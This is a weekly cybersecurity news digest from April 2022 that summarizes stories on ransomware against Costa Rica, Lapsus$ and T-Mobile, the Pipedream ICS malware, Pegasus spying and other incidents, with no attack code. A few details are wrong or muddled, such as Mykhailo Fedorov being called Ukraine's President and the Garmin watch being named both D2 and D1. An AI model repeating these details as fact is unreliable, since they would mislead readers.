Sunday, April 24, 2022 // (IG): BB //Weekly Sponsor: Philly Tech Club
Pro-Iran hackers target Israel Airports Authority website
FROM THE MEDIA: The IAA confirmed that the site had experienced a DDoS attack, but said that its operational systems and networks were unaffected. A pro-Iran hacking group named "Altahrea Team" targeted the website of the Israel Airports Authority, Israeli media reported over the weekend.
The group said its actions were "revenge" for the assassination by the United States on Jan. 3 of Iranian Quds Force commander Qassem Soleimani and Abu Mahdi Al-Muhandes, the commander of the pro-Iranian Popular Mobilization Forces Shi'ite militias in Iraq, according to Maariv.
In a statement issued Wednesday, the IAA confirmed that its website had experienced a Distributed Denial of Service (DDoS) attack, but stated that there was no harm to its operational systems or infiltration of its networks.
On March 15, multiple Israeli government websites went offline, likely due to a large-scale cyber attack conducted by "Iranian-aligned hackers."
READ THE STORY: Israel Hayom
Costa Rican government systems are in chaos due to a cyber attack
FROM THE MEDIA: Almost a week after a ransomware attack crippled Costa Rican government computer systems, the country refused to pay a ransom as it scrambled to devise workarounds and prepared itself as hackers began leaking stolen data.
The incident was claimed by the Russian-speaking Conti gang, although the Costa Rican officials had not confirmed its source.
On Monday, the Finance Ministry was the first to report issues. From tax collection through importation and exportation processes through the customs agency, a number of its systems have been impacted. Following that, there were attacks on the social security agency’s human resources system, as well as the Labor Ministry and others.
The initial attack forced the Finance Ministry to shut down for several hours the system responsible for the payment of a good part of the country’s public employees, which also handles government pension payments. It also has had to grant extensions for tax payments.
READ THE STORY: Bollyinside
The Belarusian railway workers who helped thwart Russia’s attack on Kyiv
FROM THE MEDIA: When Russian troops first streamed across the Belarusian border into Ukraine for what they had assumed would be a lightning assault on Kyiv, they were intending to rely on the region’s extensive rail network for supplies and reinforcements.
The Russians hadn’t taken into account the railway saboteurs of Belarus.
Starting in the earliest days of the invasion in February, a clandestine network of railway workers, hackers and dissident security forces went into action to disable or disrupt the railway links connecting Russia to Ukraine through Belarus, wreaking havoc on Russian supply lines.
The attacks have drawn little attention outside Belarus amid the drama of the Russian onslaught and the bloody aftermath of Russia’s humiliating retreat. Fierce Ukrainian resistance and tactical errors by an ill-prepared Russian force were likely enough to thwart Russia’s plans, analysts say.
READ THE STORY: Washington Post
Garmin’s New Aviator Watch Partly Addresses a Risk the War in Ukraine Is Highlighting – Microtargeting
FROM THE MEDIA: Late last month, electronics firm Garmin began touting its newest smartwatch for aviators, the D2 Mach 1. Aside from a host of aviation-specific features, the D1 has a “stealth mode” to halt GPS tracking and a “kill mode” to wipe its memory. Russia’s microtargeting of Ukrainian forces members via personal devices suggests Garmin’s on to something. But is it enough?
With its large 47 mm dial and high-resolution AMOLED touchscreen display, the D2 Mach 1 is impressively conspicuous, the kind of timepiece that has attracted aviators since World War I. Its direct-to navigation, pulse oximeter, GPS moving maps and NEXRAD weather radar are enticing capabilities in such a small device, multiplied greatly when the watch is Bluetooth-connected to a smartphone with Garmin’s Pilot, In-Reach or Connect apps.
Russian operatives have been collectively and individually targeting Ukrainian military service members by leveraging the data coming from apps resident on the connected devices (cell phones, tablets, computers, smart watches) they use on or near the battlefield. The practice was highlighted in a recent article for Defense News co-authored by U.S. Army Cyber Institute (ACI) researcher, Jessica Dawson, and Brandon Pugh, policy counsel for the R Street Institute’s cybersecurity and emerging threats team.
READ THE STORY: Forbes
The Ukrainians Keep Blowing Up Russian Command Posts And Killing Generals
FROM THE MEDIA: Eight years ago, a trio of Ukrainian army brigades fighting Russian-backed separatists in eastern Ukraine’s Donbas region made a fatal mistake. They idled their tanks and trucks around a static command post.
Russian drones and eavesdroppers pinpointed the command post and blasted it with artillery.
Today it’s the Russians who are making that same mistake—and the Ukrainians who are exploiting the error. In the two months since Russia widened its war on Ukraine, Kyiv’s forces have located and destroyed no fewer than 31 Russian command and communications posts.
As many as 10 Russian generals have died in combat since Russia attacked on Feb. 23, many of them in the Ukrainians’ “decapitation” strikes.
READ THE STORY: Forbes
U.S. Pentagon Praises Starlink’s Resistance to Jamming, Hacking Attempts
FROM THE MEDIA: In February 2022, SpaceX sent Starlink terminals to Ukraine and activated its satellite Internet service for the country. In March 2022, it beefed up Starlink’s ability to resist jamming attempts. Now the U.S. Pentagon has praised Starlink’s ability to resist Russia’s jamming and hacking attempts.
Russia had disrupted other forms of communication during its invasion of Ukraine. SpaceX CEO Elon Musk responded to Ukrainian President Mykhailo Fedorov’s request for help on Twitter.
Fedorov later put out a call for technological help to create a worldwide “IT Army” to help with the cyber component of its defense against Russia.
Office of the Secretary of Defense Director of Electronic Warfare Dave Tremper praised the speed at which Starlink’s tech team responded to Russia’s attacks.
Tremper called Starlink’s fast response to threats an “interesting case study” in responding to cybersecurity threats in real-time.
“Starlink had slung a line of code and had fixed it and suddenly that [line of attack] was not effective anymore,” he said at the C4ISRNet defense and military conference.
He said the Pentagon could use that kind of agility in cyber defense. A considerable amount of the modern U.S. military’s capacity depends on cyber technologies and space-based capabilities like GPS.
READ THE STORY: Red Orbit
Russian Malware Planted From Nigerian Server
FROM THE MEDIA: A Russian malware planted from a server in Nigeria was used for a recent cyber-attack on Oil India’s (OIL) system in Assam’s Duliajan, which had brought down the PSU major’s network, a top police official said on Friday.
According to the newindianexpress. com, OIL system is yet to be restored completely even after 10 days of the incident, they added. A top police official, who wished not to be named, told PTI that their investigations indicated the cyber attack was carried out from overseas.
He said: “We have found that a Russian malware was used in it. And someone, individual or group, planted it from Nigeria.”
“We are working out the details and also ascertaining whether it was planned attack or a random one that hit OIL,” the official added. The cyber-attack took place on April 10 on one of the workstation of Geological and Reservoir department of OIL, but it was intimated by the IT department on April 12.
The OIL server, network and other related services were affected as a result. The cyber attacker had demanded $ 75,00,000 (over Rs 57 crore) as ransom through a note posted on the infected PC. When contacted, OIL spokesperson, Tridiv Hazarika, told PTI that different government agencies were carrying out the investigation into the incident.
READ THE STORY: New Telegraphing
What is Motorola Solutions cyber threat organization?
FROM THE MEDIA: Motorola Solutions, a global leader in public safety and enterprise security, has launched a cyber threat information sharing and analysis organization (ISAO) focused on public safety-related information and intelligence.
Recognized by the Federal Cybersecurity and Infrastructure Security Agency (CISA), Motorola’s Public Safety Threat Alliance is part of the government’s information-sharing initiative related to cybersecurity risks and incidents.
The Public Safety Threat Alliance enables members to analyze data from multiple sources and contribute information to the wider cybersecurity public safety community and related stakeholders.
In accordance with the 2015 Executive Order “Promoting Private Sector Cybersecurity Information Sharing”, ISAOs are groups focused on sharing information related to cybersecurity risks and incidents with membership drawing from the public and private sectors.
With the establishment of the Public Safety Threat Alliance, members will be able to share and analyze information from multiple sources to proactively contribute to a stronger cybersecurity posture for the public safety community, their constituents, and other stakeholders, including government agencies and businesses.
READ THE STORY: Technology Magazine
Spain's ombudsman to probe alleged cyber spying of Catalan figures
FROM THE MEDIA: Spain's ombudsman said on Sunday it would investigate the government's alleged spying of Catalan separatist figures during the height of the region's bid for independence, while the government announced a separate inquiry by its CNI intelligence agency.
The probes come following intense pressure on the government to explain itself after Canada's Citizen Lab group, a digital rights group, said more than 60 people linked to the Catalan separatist movement, including several MEPs, politicians, lawyers and activists, had been targets of "Pegasus" spyware made by Israel's NSO Group.
READ THE STORY: DUO
Early Discovery of Pipedream Malware a Success Story for Industrial Security
FROM THE MEDIA: The recent discovery of a malware framework — referred to as both Pipedream and Incontroller — targeting industrial control systems (ICS) highlights what can happens when everything goes right, ICS security professionals stressed at a panel discussion hosted by the Atlantic Council on April 22.
Unlike as in previous attacks, cybersecurity experts detected components of the malware, researching the attackers' techniques, and erected defenses against Pipedream, before it was even deployed. In its current state, the framework boasts capabilities that can scan for and communicate with some programmable logic controllers from Schneider Electric and Omron, as well as scan and profile unified communication servers based on the OPC Unified Architecture specification.
The expertise and capabilities encapsulated in the framework point to a nation-state actor as the source, making the coordinated investigation a significant win, and the best argument for the return on investment (ROI) of cybersecurity, says Danielle Jablanski, operational technology cybersecurity strategist at Nozomi Networks and a former consultant for the US Department of Defense.
READ THE STORY: Reuters
Millions Of Android Smartphones Could Be Attacked Using A Media File
FROM THE MEDIA: Android smartphone users face regularly threat from different security issues and this week it has a big problem that affects millions of users. Most of these smartphones run on Qualcomm and MediaTek chipsets, and because of a security vulnerability in an audio format, over 67 percent of Android smartphones were at a big risk of security attack.
Even though the vulnerability was fixed with a patch last year, millions of Android smartphone could have fallen prey to the problem, putting them in danger.
All these details have been given by researchers at Check Point Research this week. Its researchers discovered the problem via the Apple Lossless Audio Codec or ALAC that Apple opened up to non-Apple devices to offer lossless music quality for streaming.
READ THE STORY: News18
Cryptomining botnet targeting Docker on Linux systems
FROM THE MEDIA: LemonDuck, a well-known cryptomining botnet, is targeting Docker on Linux systems to coin digital money, CloudStrike has reported.
The vendor's threat research team revealed in a blog written by Manoj Ahuje that the botnet is leveraging Docker APIs exposed to the internet to run malicious containers on Linux systems.
Docker is used to build, run, and mange containerized workloads. Since it runs primarily in the cloud, a misconfigured instance can expose a Docker API to the internet where it can be exploited by a threat actor, who can run a crypto miner inside an outlaw container.
Mike Parkin, an engineer at Vulcan Cyber, a provider of SaaS for enterprise cyber risk remediation, explains that one of the main ways attackers compromise containerized environments is through misconfigurations, which just shows how many organizations are failing to follow industry best practices.
"There are tools available that can protect these environments from unauthorized use, and workload monitoring tools that can flag unusual activity," he said in an interview. "The challenge can be coordinating between the development teams and the security teams, but there are risk management tools that can handle that as well."
READ THE STORY: Arnnet
Lapsus$ stole T-Mobile's source code before member arrests in March
FROM THE MEDIA: Before police arrested seven of the group's more prolific members in late March, ransomware gang Lapsus$ stole T-Mobile's source code that same month. In a report published Friday and spotted by The Verge, security journalist Brian Krebs shared screenshots of private Telegram messages that show the group targeted the carrier multiple times.
"Several weeks ago, our monitoring tools detected a bad actor using stolen credentials to access internal systems that house operational tools software," T-Mobile told Krebs. "Our systems and processes worked as designed, the intrusion was rapidly shut down and closed off, and the compromised credentials used were rendered obsolete." The company added the "systems accessed contained no customer or government information or other similarly sensitive information."
Lapsus$ initially accessed T-Mobile's internal tools by buying stolen employee credentials on websites like Russian Market. The group then carried out a series of SIM swap attacks. Those type of intrusions typically involve a hacker hijacking their target's mobile phone by transferring the number to a device in their possession. The attacker can then use that access to intercept SMS messages, including links to password resets and one-time codes for multi-factor authentication. Some Lapsus$ members attempted to use their access to hack into T-Mobile accounts associated with the FBI and Department of Defense but failed to do so due to the additional verification measures tied to those accounts.
Hackers have frequently targeted T-Mobile in recent years. Last August, the company confirmed it had fallen victim to a hack that saw the personal data of more than 54 million of its customers compromised. That breach also involved SIM swap attacks and may have even seen the carrier secretly pay a third-party firm to limit the damage.
READ THE STORY: Engadget
Items of interest
US government links $622 million stolen from Axie Infinity to more Ethereum wallets
FROM THE MEDIA: U.S. Treasury Department officials have tied North Korean hacking group Lazarus to an Ethereum wallet used in the $622 million Ronin Network exploit, a sidechain created for play-to-earn game Axie Infinity.
Now, three more wallet addresses have been identified by the U.S Treasury Department as being associated with the attack.
The Treasury’s Office of Foreign Asset Control (OFAC) has just added wallets associated with Lazarus to its list of sanctions. A significant amount of stolen funds has been sent to all three wallets in the past week from the original wallet linked to the Ronin attack.
READ THE STORY: Nairametrics
DOXXING & The Law (Video)
FROM THE MEDIA: Although Doxing has been around for a while it really has become the "go" to word when ANY information about a person is searched and/or posted. So let's really look at Doxing, the laws, what you can or can't do, and clear up any misconceptions.
OSINT: Best resources to get started // You can't hide from OSINT (Video)
FROM THE MEDIA: Want to learn OSINT? Want to learn how easy it is to find information online? Time to learn Open Source Intelligence from the best.
About this Product
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com